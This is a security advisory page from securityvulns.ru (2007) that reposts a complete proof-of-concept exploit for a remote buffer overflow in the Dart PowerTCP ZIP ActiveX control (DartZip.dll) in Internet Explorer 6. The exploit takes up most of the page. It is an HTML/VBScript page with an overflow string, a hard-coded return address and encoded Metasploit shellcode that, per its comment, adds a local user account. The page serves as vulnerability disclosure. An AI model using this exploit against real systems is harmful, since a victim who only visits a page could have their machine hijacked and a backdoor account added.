Computer Security

Security Advisory: IE 6 / Dart Communications PowerTCP ZIP Compression Control (DartZip.dll 1.8.5.3) remote buffer overflow
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Dart Communications PowerTCP ActiveX buffer overflow

  Dart Communications PowerTCP Service Control (DartService.dll 3.1.3.3) remote buffer overflow

From:retrog_(at)_alice.it <retrog_(at)_alice.it>
Date:26.05.2007
Subject:IE 6 / Dart Communications PowerTCP ZIP Compression Control (DartZip.dll 1.8.5.3) remote buffer overflow

<!--
IE 6 / Dart Communications PowerTCP ZIP Compression Control (DartZip.dll 1.8.5.3) remote
buffer overflow exploit / xp sp2 it
by rgod
site: retrogod.altervista.org
software site: www.dart.com
-->
<html>
<object classid='clsid:42BA826E-F8D8-4D8D-8C05-14ABCE99D4DD' id='DartZip'></object>
<script language='vbscript'>

'metasploit one, add a user 'sun' with pass 'tzu'
shellcode = unescape("%eb%03%59%eb%05%e8%f8%ff%f
f%ff%4f%49%49%49%49%49%49%51%5a%56%
54%58%36%33%30%56%58%34%41%30%42%36%
48%48%30%42%33%30%42%43%56%58%32%42%
44%42%48%34%41%32%41%44%30%41%44%54%
42%44%51%42%30%41%44%41%56%58%34%5a%
38%42%44%4a%4f%4d%4e%4f%4a%4e%46%54%
42%30%42%30%42%30%4b%58%45%44%4e%43%
4b%38%4e%57%45%50%4a%37%41%50%4f%4e%
4b%48%4f%44%4a%51%4b%48%4f%45%42%42%
41%50%4b%4e%49%34%4b%48%46%43%4b%38%
41%30%50%4e%41%43%42%4c%49%49%4e%4a%
46%58%42%4c%46%57%47%50%41%4c%4c%4c%
4d%50%41%30%44%4c%4b%4e%46%4f%4b%33%
46%35%46%42%46%50%45%47%45%4e%4b%58%
4f%35%46%32%41%30%4b%4e%48%56%4b%48%
4e%50%4b%54%4b%38%4f%35%4e%41%41%50%
4b%4e%4b%38%4e%51%4b%38%41%30%4b%4e%
49%38%4e%45%46%42%46%50%43%4c%41%43%
42%4c%46%46%4b%58%42%44%42%33%45%48%
42%4c%4a%57%4e%50%4b%38%42%54%4e%30%
4b%38%42%37%4e%41%4d%4a%4b%58%4a%36%
4a%30%4b%4e%49%50%4b%58%42%38%42%4b%
42%50%42%50%42%30%4b%38%4a%56%4e%43%
4f%55%41%53%48%4f%42%36%48%55%49%48%
4a%4f%43%58%42%4c%4b%47%42%45%4a%36%
42%4f%4c%58%46%30%4f%45%4a%46%4a%49%
50%4f%4
c%38%50%30%47%45%4f%4f%47%4e%43%36%
4d%56%46%36%50%32%45%46%4a%47%45%56%
42%52%4f%52%43%36%42%52%50%46%45%56%
46%47%42%52%45%47%43%37%45%56%44%57%
42%42%43%57%45%47%50%56%42%52%46%47%
4c%37%45%47%42%52%4f%42%41%34%46%34%
46%54%42%42%48%42%48%32%42%52%50%46%
45%36%46%57%42%52%4e%46%4f%36%43%56%
41%46%4e%36%47%56%44%47%4f%36%45%57%
42%37%42%52%41%54%46%46%4d%56%49%46%
50%56%49%36%43%37%46%47%44%37%41%56%
46%47%4f%56%44%37%43%37%42%52%43%57%
45%57%50%46%42%42%4f%32%41%34%46%54%
46%54%42%50%5a")

EIP = unescape("%67%31%41%7e") 'call esp user32.dll

Source=String(1024, "A") + EIP + String(36, unescape("%90")) + shellcode  + String(24, unescape("%90"))
Destination="default"
IncludeSubs=True
PreservePath=True
Password="default"
Encryption=1

DartZip.QuickZip Source ,Destination ,IncludeSubs ,PreservePath ,Password ,Encryption

</script>
</html>


original url: http://retrogod.altervista.org/ie_DartZip_bof.html
About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru